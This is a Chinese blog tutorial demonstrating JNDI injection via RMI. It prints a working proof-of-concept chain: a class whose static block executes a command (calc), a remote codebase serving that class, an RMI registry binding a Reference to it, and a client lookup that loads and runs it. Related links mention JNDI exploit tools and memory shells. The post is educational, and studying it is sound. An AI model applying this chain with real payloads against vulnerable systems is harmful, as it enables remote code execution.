JNDI注入demo使用rmi方式

最新推荐文章于 2022-11-17 11:12:52 发布
最新推荐文章于 2022-11-17 11:12:52 发布
阅读量909 收藏 2
点赞数 2
分类专栏: # JAVA基础 文章标签: jndi
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dmw412724/article/details/121890933
版权

JNDI注入demo

JNDI(The Java Naming and Directory Interface,Java命名和目录接口)是一组在Java应用中访问命名和目录服务的API,命名服务将名称和对象联系起来,使得我们可以用名称访问对象。

这些命名/目录服务提供者:

RMI (JAVA远程方法调用)
LDAP (轻量级目录访问协议)
CORBA (公共对象请求代理体系结构)
DNS (域名服务)

大致说下原理,JNDI可以获取远程类并在当前环境里面执行。
如果我们知道的某个程序某一处执行了JNDI,那么我们编写一个恶意类让其访问获取,就可以做很多事情了。
当前demo使用的是rmi协议

一。准备工作

1.编写一个恶意类Muma.

里面调用了calc,这个相当于调用了一个计算器。

public class Muma {
	static {
		try {
			Runtime.getRuntime().exec("calc").waitFor();
		} catch (Exception  e1) {
			e1.printStackTrace();
		}
	}
}

值得注意的是,这里面不能有package。

2.编译Muma

javac Muma.java

然后我们获得了Muma.class

3.把Muma.class放到服务器上面。

本例放到tomcat的ROOT下面。
启动tomcat,http://localhost:8080/Muma.class可以获取到该文件。

4.架设rmi服务器。

import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

import javax.naming.Reference;

import com.sun.jndi.rmi.registry.ReferenceWrapper;

public class RmiServer {
	public static void main(String[] args) throws Exception {
		//恶意类名字
		String className = "Muma";
		//恶意类.class所在的服务器
		String classNameServer = "http://localhost:8080/";
		
		
		//rmi服务器的端口
		int port = 9527;
		//rmi服务器对外开放的名字
		String rmiClassName = "muma123";
		
		
		Registry registry = LocateRegistry.createRegistry(port);
		Reference r = new Reference(className, className, classNameServer);

		registry.bind(rmiClassName, new ReferenceWrapper(r));
		
		System.out.println("启动rmi服务:localhost:"+9527+",对外开放:"+rmiClassName);
	}
}

到此为止,我们的准备工作做好了。然后我们做个客户端来访问下这个rmi服务。

4.测试

import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;

public class RmiClient {
	public static void main(String[] args) throws NamingException {
		System.setProperty("java.rmi.server.useCodebaseOnly", "false");
		System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
		Context context = new  InitialContext();
		context.lookup("rmi://127.0.0.1:9527/muma123");
	}
}

在这里插入图片描述
相当的的NICE!!!

结语

jndi可以由rmi、ladp等多种协议实现。

JAVA道人
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
jndi使用实例
03-15
NULL 博文链接:https://blueskylan.iteye.com/blog/336447
JNDI:JNDI注入利用工具
03-21
JNDI注入利用工具 介绍 本项目为JNDI注入利用工具,生成JNDI连接并启动初始化相关服务,可用于Fastjson,Jackson等相关突破的验证。 本项目是基于welk1n的 ,在此项目的基础服务框架上,重新编写了攻击利用代码,...
02_Java通信_JNDI_demo1
chaojixiaozhu的专栏
12-29 528
下面这个小demo会将一个对象绑定到一个JNDI服务器上,然后通过JNDI客户端获得这个对象。 PS:我们姑且这样叫:JNDI服务器,JNDI客户端这样理解起来可能比较简单 1.建立一个普通的Java项目 2.导入JDK 在JDK 5的rt.jar中一共找到了4种SUN自带的JNDI实现:LDAP,CORBA,RMI,DNS。 这4种JNDI要正常运行还需要底层的相应服务。我们没有LD
对象与对象引用的区别
m0_48957269的博客
10-13 83
对象:是一个实例 对象引用:是对象的地址
JNDI注入
Christ1na的博客
11-17 773
JNDI(The Java Naming and Directory Interface,Java命名和目录接口)是一组在Java应用中访问命名和目录服务的API,命名服务将名称和对象联系起来,使得我们可以用名称访问对象。
JNDIExploit:用于JNDI注入攻击的恶意LDAP服务器
03-19
一款用作JNDI注入利用的工具,大量参考/引用了Rogue JNDI项目的代码,支持直接插入植入内存shell ,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用使用说明 使用java -jar JNDIExploit.jar -...
JNDI注入学习1
08-03
**JNDI注入详解** ...通过理解JNDI注入的原理和防范措施,开发者可以有效地保护他们的应用程序免受这种攻击方式的威胁。在编写代码时,始终牢记安全优先,对用户输入进行严格的检查和过滤,是预防这类漏洞的关键。
JNDIDemo 以及相关文档
05-14
9. **JNDIDemo**:提供的`JNDIDemo`可能是一个示例程序,展示了如何使用JNDI进行查找、绑定等操作。通过查看源代码和运行示例,可以深入理解JNDI的工作原理。 10. **学习资料**:提供的文档,如`java的JNDI 技术...
java RMI demo
07-04
- **JNDI(Java Naming and Directory Interface)**:RMI通常与JNDI结合使用,提供更高级别的命名和目录服务,帮助管理和查找远程对象。 - **RMI配置**:包括设置RMI主机和端口,以及处理SSL安全连接等。这些通常...
基于JavaJNDI的LDAP Demo
05-24
基于Java JNDI 操纵LDAP的基础实现,包括LDAP连接相关生命周期,认证的两种策略demo,条目的操作,schema的基础操作包括(attributeDefinition\objectDefinition\)但未包含相关syntaxDefinition的操纵. 没有资源分的朋友可给我发邮件ybygjy#gmail.com
JNDI代码样例
02-07
实现JAVA调用CS类库DLL的 JNDI代码样例
Java演示JNDI使用.rar
07-10
Java演示JNDI使用,在EJB中使用JNDI的例子,首先初始化Context,它是连接JNDI树的起始点,查找对象、打印对象、关闭Context。
JNDIRMI 远程方法调用
weixin_30500663的博客
09-01 399
转载于:https://www.cnblogs.com/luswei/p/7461776.html
03_Java通信_JNDI_demo2远程调用weblogic的数据源
chaojixiaozhu的专栏
07-23 265
demo1中我们简单实现了一个通过JNDI来获得person这个对象,但是因为运行在同一个项目中,表现的形式不是那么强烈。 下面我们使用远程的web服务器上的数据源来测试一下。远程weblogic服务器上定义一个数据源。在本地通过JNDI获得这个数据源,并且查询远程数据源中的数据。 在操作之前先来创建先决条件: 1.查看本地IP,确保weblogic服务器和本地不在一起   2....
Java远程调用RMI
文盲青年的博客
12-11 1043
JNDIRMI使得Java实现了跨JVM的方法远程调用,即服务A可以远程调用服务B的方法。 我们一一个服务A,调用远程的另外一个服务为例,具体操作有以下两种: 代码在B执行 代码在A执行 一、原理 RMI过程大体如下:   1.客户端从RMI注册表中查询并获取远程对应引用。客户端首先会与Stub进行交互,stub将远程方法所需的参数进行序列化后,传递给远程应用层RRL   2.stub和远程对象具有相同的接口和方法列表,当客户端调用远程对象时,实际是有stub对象代理的。RRL将stub本地引用转换
RMI远程方法调用完整示例【java项目】
05-12 3077
至于分布式概念以及开发技术上篇博客已经介绍,这篇博客则总结J2EE中的分布式基础RMI远程调用。     通过博客,可以学习了解RMI如何使用。     RMI—remote method invoke 远程方法调用;通过rmi调用其他计算机对象或服务,类似我们普通调用本地对象或服务一样。RMI是纯java实现,无需其他的jar,直接jdk实现,比较方便。当然这也是他的一个弊端,只允许java
RMIJNDI集成服务实例
lance2050的专栏
08-08 289
     下午和莉莉讨论JNDI,感觉网上好多资料都写到太过于高深莫测了,具体了解了之后,发现JNDI使用目的,最根本的就是java应用通过一个名字获取其他JVM中的数据。而在提供JNDI服务的服务端应用中,建立了一个类似键值对的形式,存储JNDI的名字和数据的绑定。这就类似于数据库的连接池,不必每次去连接数据库都重新建立一个连接,而是直接从连接池中获取已有连接拿来使用即可,节省了内存同时也...
JNDI 原理 以及JBoss Demo
hekeji
08-13 187
摘要: 本文详细介绍了JNDI的架构与实现,JNDI的工作原理,并给出了具体代码,帮助读者更理解J2EE主要常用技术---JNDI.本文为系列文章的第一篇,其它相关文章会在近期推出。 名词解释 jndi是Java 命名和目录接口(Java Naming and Directory Interface,JNDI)的简称.从一开始就一直是 Java 2 平台企业版(JEE...
jndi可以调用LDAP RMI
最新发布
07-25
- RMI使用JNDI的命名服务来查找远程对象的引用,从而实现客户端与远程对象之间的通信。 - 通过JNDI,可以在分布式系统中定位和获取RMI服务的引用,从而实现远程方法调用。 总结而言,JNDI是一个用于访问和操作...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值